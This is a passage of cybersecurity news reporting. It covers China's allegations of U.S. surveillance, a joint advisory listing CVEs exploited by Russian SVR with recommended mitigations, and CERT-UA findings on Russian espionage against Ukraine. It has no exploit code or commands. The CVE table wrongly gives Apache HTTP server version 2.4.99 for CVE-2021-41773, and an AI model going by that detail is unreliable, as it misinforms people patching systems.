The allegations don’t stop at cyberattacks alone. According to CVERC’s investigation, the U.S. has woven these tactics into a broader strategy of influence operations. These operations aim to shape perceptions, spread disinformation, and destabilize target nations. They go beyond the battlefield of bits and bytes, extending into media and public discourse. The report claims the U.S. employs a framework of 4D principles (deny, disrupt, degrade, deceive) to maintain control over the narrative in cyberspace. These principles, seen in disinformation campaigns like Volt Typhoon, are designed to manipulate how cyberattacks are perceived, allowing the U.S. to downplay its own activities while amplifying those of its adversaries. China also came down heavily on the usage of naming conventions like “Panda” and “Dragon” used in the attribution of China-linked threat actors, claiming it is geopolitically motivated and equivalent to racial targeting. “Some U.S. companies, such as Microsoft and CrowdStrike, for their commercial interest and without sufficient evidence and rigorous technical analysis, have been keen on coining various absurd codenames with obvious geopolitical overtones for hacker groups, such as ‘typhoon,’ ‘panda,’ and ‘dragon,’ instead of ‘Anglo-Saxon,’ ‘hurricane,’ and ‘koala,’” the CVERC report said.

Global Surveillance: The ‘UpStream’ and ‘Prism’ Projects

The core of the accusations against the U.S. is its alleged use of mass surveillance projects, known as “UpStream” and “Prism,” which work together to siphon vast amounts of data from global internet traffic. UpStream, according to the report, is designed to capture raw communication data passing through key internet infrastructure like submarine fiber optic cables, while Prism allows U.S. intelligence agencies to access user data from major tech companies like Microsoft, Google, and Facebook. By combining these two systems, the U.S. allegedly maintains the ability to monitor vast quantities of data in real time. This capability provides actionable intelligence for military, diplomatic, and economic purposes, making the U.S. a formidable player in the world of cyber espionage. But it’s not just foreign adversaries that are affected. The report suggests that U.S. citizens, despite legal protections like FISA Section 702, also fall under the watchful eye of these surveillance programs. The Foreign Intelligence Surveillance Court itself has acknowledged several violations, pointing to instances where U.S. intelligence agencies allegedly overstepped their bounds, the report suggests.

Backdoor Implants and Supply Chain Attacks

Another concerning element is the claim that U.S. intelligence agencies conduct supply chain attacks, where they insert backdoors into hardware and software products sold to foreign targets. Once compromised, these products can act as entry points for further espionage. The National Security Agency’s (NSA) Office of Tailored Access Operations (TAO) allegedly plays a key role in these activities. By intercepting shipments of network equipment, disassembling them, and implanting malicious backdoors, the NSA ensures long-term access to compromised systems. These supply chain attacks represent one of the most covert and effective ways to infiltrate secure networks, posing significant risks to critical infrastructure across the globe, China said.

Global Fallout: Targeting Allies and Adversaries Alike

China added that U.S. espionage activities haven’t been limited to adversaries. It said allies such as Germany, France, and Japan have also found themselves under the surveillance lens, with high-level communications reportedly intercepted as part of broader intelligence-gathering efforts. For instance, German Chancellor Angela Merkel’s communications were allegedly monitored by U.S. intelligence, causing a diplomatic rift between the two nations when the operation was exposed, CVERC reported. Similar accusations have surfaced regarding France, with the NSA reportedly eavesdropping on phone calls from French government officials and business leaders.

U.S. Companies’ Role in Espionage

Microsoft, one of the largest cloud and enterprise software providers globally, has found itself entangled in these accusations. According to the report, Microsoft’s tools and platforms may be integral to U.S. intelligence operations, providing both the infrastructure and capabilities for data collection. The report also alleges that Microsoft has been developing tools specifically for U.S. intelligence, further deepening its collaboration with the federal government. This relationship, the report suggests, raises serious questions about privacy and the ethical implications of corporate cooperation in state-led surveillance activities. Interestingly, both Microsoft and the U.S. government have time and again placed the same accusations on Volt Typhoon, which China has disputed.
- Russian SVR Exploiting Unpatched Vulnerabilities in Global Cyber Campaign by Mihir Bagwe on October 10, 2024 at 5:14 pm
Russian Foreign Intelligence Service (SVR) cyber actors are once again in the spotlight, exploiting widespread vulnerabilities in a global campaign aimed at government, technology, and finance sectors. In a new joint advisory, the UK’s National Cyber Security Centre (NCSC) and U.S. agencies warned that SVR cyber operations, known for the SolarWinds attack and targeting COVID-19 vaccine research, have shifted their focus to unpatched software vulnerabilities across a range of sectors.

“Russian cyber actors are interested in and highly capable of accessing unpatched systems across a range of sectors, and once they are in, they can exploit this access to meet their objectives.” – Paul Chichester, NCSC Director of Operations

SVR’s Tactics: A Persistent Global Threat

The SVR, also referred to as APT29 or Cozy Bear, has demonstrated an alarming ability to exploit known vulnerabilities, particularly those left unpatched by organizations. The group is infamous for its persistent and stealthy cyber operations, often targeting government entities, think tanks, and private corporations to collect foreign intelligence. One key aspect of their approach is the two types of targets they pursue. The first includes entities of strategic interest such as governments, financial institutions, and technology companies. These “targets of intent” are carefully selected for their intelligence value. The second group, known as “targets of opportunity,” consists of any organization with unpatched systems that can be exploited for malicious purposes.

SVR Exploiting Unpatched Vulnerabilities at Scale

The advisory includes over 20 publicly disclosed vulnerabilities that SVR actors are actively targeting. Organizations across the globe, including those in the UK, are being urged to rapidly deploy patches and prioritize software updates to minimize exposure to these threats. Once SVR actors gain initial access through unpatched systems, they can escalate privileges and move laterally across networks, often compromising connected systems such as supply chains. This enables them to launch further operations, including espionage, data exfiltration, and network disruption. Following is the complete list of unpatched vulnerabilities that Russian SVR was observed exploiting:

| CVE | Vendor/Product | Details |
| --- | --- | --- |
| CVE-2023-20198 | Cisco IOS XE Software web UI feature | Privilege escalation vulnerability that allows an attacker to create a local user and password combination |
| CVE-2023-4911 | RHSA GNU C Library’s dynamic loader ld.so | Buffer overflow vulnerability that could allow a local attacker to execute code with elevated privileges |
| CVE-2023-38545 | Haxx Libcurl | SOCKS5 heap buffer overflow vulnerability |
| CVE-2023-38546 | Haxx Libcurl | Missing authorization vulnerability that allows an attacker to insert cookies in a running program if certain conditions are met |
| CVE-2023-40289 | Supermicro X11SSM-F, X11SAE-F, and X11SSE-F 1.66 | Command injection vulnerability that allows an attacker to elevate privileges |
| CVE-2023-24023 | Bluetooth BR/EDR devices with Secure Simple Pairing and Secure Connections pairing in Bluetooth Core Specification 4.2 through 5.4 | Allows certain man-in-the-middle attacks that force a short key length [CWE-326], and might lead to discovery of the encryption key and live injection, aka BLUFFS |
| CVE-2023-40088 | Android | Use after free vulnerability that could lead to remote (proximal, adjacent) code execution |
| CVE-2023-40076 | Google Android 14.0 | Permissions bypass vulnerability that allows an attacker to access credentials and escalate local privileges |
| CVE-2023-40077 | Google Android 11-14 | Use after free vulnerability that can lead to escalation of privileges |
| CVE-2023-45866 | Bluetooth HID Hosts in BlueZ | Improper authentication vulnerability that could allow an attacker in close proximity to inject keystrokes and carry out arbitrary commands |
| CVE-2022-40507 | Qualcomm | Double free vulnerability |
| CVE-2023-36745 | Microsoft Exchange Server | Remote code execution |
| CVE-2023-4966 | Citrix NetScaler ADC, NetScaler Gateway | Buffer overflow vulnerability |
| CVE-2023-6345 | Google Chrome | Integer overflow vulnerability that allows a remote attacker to potentially perform a sandbox escape via a malicious file |
| CVE-2023-37580 | Zimbra | Cross-site scripting (XSS) vulnerability |
| CVE-2021-27850 | Apache Tapestry | Critical unauthenticated remote code execution vulnerability |
| CVE-2021-41773 | Apache HTTP server 2.4.99 | Directory traversal vulnerability |
| CVE-2021-42013 | Apache HTTP server 2.4.50 | Remote code execution vulnerability |
| CVE-2018-13379 | Fortinet FortiGate SSL VPN | Path traversal vulnerability |
| CVE-2023-42793 | JetBrains TeamCity | Authentication bypass vulnerability |
| CVE-2023-29357 | SharePoint Server | Elevation of privilege vulnerability |
| CVE-2023-24955 | SharePoint Server | Remote code execution vulnerability |
| CVE-2023-35078 | Ivanti Endpoint Manager Mobile versions through 11.10 | Authentication bypass vulnerability |
| CVE-2023-5044 | Kubernetes Ingress-nginx | Code injection vulnerability |

Not Just a Cybersecurity Threat: Broader Implications

The report also sheds light on how SVR actors adapt their techniques to keep pace with evolving technology. The NCSC warns that the group has adjusted its approach in response to the increasing reliance on cloud infrastructure, exploiting cloud misconfigurations and weak security practices. This makes them a formidable adversary for organizations that are migrating or already relying heavily on cloud services. SVR actors have also been linked to recent large-scale attacks, including the supply chain compromise of SolarWinds and a series of spear-phishing campaigns targeting COVID-19 vaccine research. These incidents demonstrate the group’s focus on strategic assets and their potential to impact national security and public health.

APT29’s Arsenal: From Phishing to Supply Chain Attacks

The advisory also outlines the tactics, techniques, and procedures (TTPs) employed by SVR cyber actors. Their arsenal includes spear-phishing campaigns, password spraying, supply chain attacks, and the abuse of trusted relationships. These methods allow them to gain initial access and conduct follow-up operations from compromised accounts. For instance, in recent campaigns, SVR actors were found to exploit cloud environments using Microsoft Teams accounts impersonating technical support to trick victims into granting access. By compromising poorly secured small business accounts, they were able to create platforms for targeting high-profile organizations.

Infrastructure and Evasion Tactics

SVR cyber actors are known for their ability to remain undetected for extended periods. They frequently use The Onion Router (TOR) network and proxy services to obfuscate their activity. In some cases, they lease infrastructure using fake identities and low-reputation email accounts to avoid detection. When SVR suspects that their operations have been uncovered, they move quickly to destroy their infrastructure and any evidence on it. This evasive approach makes it difficult for investigators to trace their operations back to the original source.

Recent Exploitations: Zimbra, JetBrains, and More

SVR actors have also been involved in exploiting several high-profile vulnerabilities. For example, the advisory mentions the exploitation of Zimbra mail servers using CVE-2022-27924, a command injection vulnerability that allowed attackers to access user credentials without victim interaction. More recently, they exploited JetBrains TeamCity’s CVE-2023-42793 vulnerability, enabling arbitrary code execution. This kind of exploitation highlights SVR’s focus on widely used software systems, allowing them to infiltrate a broad range of sectors and geographies.

Mitigations: What Organizations Can Do

In light of these ongoing campaigns, the NCSC and U.S. agencies have provided several recommendations to help organizations defend against SVR cyber actors. These include:

  - Rapid deployment of patches and updates: Organizations should prioritize software updates as soon as they become available to close known vulnerabilities.
  - Multi-factor authentication: Implementing multi-factor authentication across networks and systems can reduce the risk of unauthorized access.
  - Auditing cloud accounts: Regularly auditing cloud-based accounts for unusual activity can help detect intrusions before they escalate.
  - Reducing attack surface: Disable unnecessary internet-facing services and remove unused applications to limit points of entry for attackers.
- Russia’s H1 2024 Cyber Offensive Strategy Favored Espionage Over Destruction by Mihir Bagwe on September 23, 2024 at 4:47 pm
Moscow preferred espionage over destruction in its cyber offensive strategy against Ukraine in the first half of 2024, displaying the evolving nature of the Kremlin’s targeted cyberattacks on Kyiv. The cyber battlefield has shifted in 2024, with Russian hacker groups adopting more covert and long-term strategies. Rather than the large-scale infrastructure attacks seen in previous years, Russian cyber operatives have turned to espionage, focusing on military and critical infrastructure targets to support their ongoing war against Ukraine. While cyber incidents have risen overall, the number of high and critical severity attacks has dropped. This shift marks a strategic change, moving from broad, destructive cyberattacks to more focused and sustained infiltration efforts aimed at gathering intelligence.

The Numbers Behind the Attacks

A report released on Monday by the Computer Emergency Response Team of Ukraine revealed this shift in focus. H1 2024 saw a total of 1,739 cyber incidents, a 19% increase from the second half of 2023. However, the number of critical incidents dropped by 90%, with only three reported in the first half of 2024 compared to 31 in the latter half of 2023. High-severity incidents also saw a sharp decline, falling by 71%, while medium and low-severity incidents increased by 32% and 75%, respectively.

(Source: SSSCIP)

This data suggests that while the overall frequency of cyberattacks has grown, the attackers’ tactics have shifted towards lower-profile activities designed to avoid detection. These lower-severity incidents often involve malware distribution, espionage, and efforts to maintain access to compromised systems rather than causing immediate, visible damage.

(Source: SSSCIP)

Targeted Espionage and Covert Operations

In 2022 and 2023, Russian hackers focused on disrupting Ukraine’s critical infrastructure, aiming to cripple government agencies, energy providers, and internet service providers (ISPs). However, the swift recovery of Ukraine’s systems meant these attacks did not achieve their intended long-term goals. The 2024 shift towards espionage reflects a more calculated approach. Groups like UAC-0184 and UAC-0020, aka the Vermin hacker group, both linked to Russian intelligence services, have been particularly active this year. These groups specialize in cyber espionage, using phishing campaigns and malicious software to gain access to sensitive systems. UAC-0184, for example, has targeted members of Ukraine’s Defense Forces through messaging apps like Signal, impersonating trusted contacts to distribute malware. Once the malware is deployed, the hackers can monitor communications, steal data, and maintain long-term control over the compromised systems. This pivot from overt attacks to espionage also marks a new phase in Russia’s cyber strategy. Rather than causing immediate disruption, the focus now lies in gathering intelligence to support military operations. CERT-UA’s report highlights how hackers are using cyber operations to collect feedback on kinetic military strikes, such as missile attacks.

Critical Infrastructure Still in Focus

Though espionage has taken center stage, attacks on critical infrastructure continue. The report notes that attacks on Ukraine’s energy sector have more than doubled since the latter half of 2023, with hackers increasingly targeting industrial control systems (ICS) used by power, heat, and water supply facilities. The UAC-0002 group, which has ties to Russian law enforcement in occupied Luhansk, executed a significant supply chain attack in March 2024. The hackers exploited vulnerabilities in software used by at least 20 energy companies, gaining access to ICS and using it for lateral movement within the networks. This kind of supply chain attack allows hackers to breach multiple organizations simultaneously by targeting a common service provider. In the March incident, UAC-0002 targeted three supply chains, infecting multiple energy companies with malware and backdoors. The attackers used specialized software, such as LOADGRIP and BIASBOAT, to gain access to critical systems and escalate their attacks, possibly to complement physical strikes on Ukrainian infrastructure.

Messenger Account Theft: New Entrant in Cyber Offensive Strategy

Another notable trend in 2024 is the increasing focus on messenger account theft. Platforms like WhatsApp and Telegram, widely used by Ukrainian citizens, have become prime targets for Russian hackers.

(Source: SSSCIP)

The UAC-0195 group, for instance, used phishing campaigns to compromise thousands of messenger accounts. These compromised accounts are then used for a range of malicious activities, including spreading malware, conducting espionage, and committing financial fraud. In one instance, hackers posed as organizers of a petition to honor a fallen Ukrainian soldier. They directed victims to a fake website mimicking the President of Ukraine’s official page, where users were asked to authenticate via WhatsApp. This phishing tactic allowed hackers to add their devices to victims’ WhatsApp accounts, gaining access to personal messages, files, and contacts. This tactic extended to Telegram, where hackers used a similar method to lure users into “voting” in an art competition, once again gaining unauthorized access to accounts. With this access, hackers can impersonate the account holder, spread further phishing links, and even steal sensitive information from high-value targets. The latest findings were revealed just days after Ukraine banned the use of the Telegram messenger app on government, military or critical infrastructure-linked devices. This decisive move follows growing concerns over its vulnerability to cyber espionage. The NCSCC’s meeting on September 19 highlighted how the widely used app has transformed from a tool for free speech into a weapon of war.

Phishing Campaigns and Malware Distribution

Phishing remains a key tool for Russian hackers. In early 2024, UAC-0006, a financially motivated group, continued its phishing campaigns targeting employees in financial departments. These campaigns often used polyglot archives (files that appear differently depending on the software used to open them) to deliver malware like SmokeLoader. Once deployed, SmokeLoader allows attackers to install additional malware, such as TALESHOT, which captures screenshots when a banking application is open. This malware enables hackers to gain a deeper understanding of the victim’s activities and access critical financial data. In some cases, hackers even edited or created fraudulent invoices to steal funds from targeted organizations. The UAC-0006 group briefly paused operations in March 2024, but returned in May with renewed efforts, registering new domains to continue phishing attacks and regain control over previously compromised systems.

Ukraine’s Cyber Resilience: A Battle on Two Fronts

Despite the rising number of cyberattacks, Ukraine’s cyber defenses have shown remarkable resilience. CERT-UA, in collaboration with the State Service for Special Communications and Information Protection (SSSCIP), has made significant strides in defending against these threats. Their efforts have resulted in a sharp decline in high-severity incidents, even as overall attack numbers rise. The report credits improved visibility and collaboration with international partners for this success. Enhanced detection capabilities, coupled with better awareness among organizations, have allowed Ukraine to respond more quickly to emerging threats. This collaboration includes sharing cyber threat intelligence with CERT-UA’s partners, which has helped identify and mitigate numerous attacks. However, the report also warns that the capabilities of Russian hackers continue to grow as the war drags on. The increasing sophistication of supply chain attacks and the persistent threat of phishing campaigns mean that Ukraine’s cyber defense strategies will be tested time and again.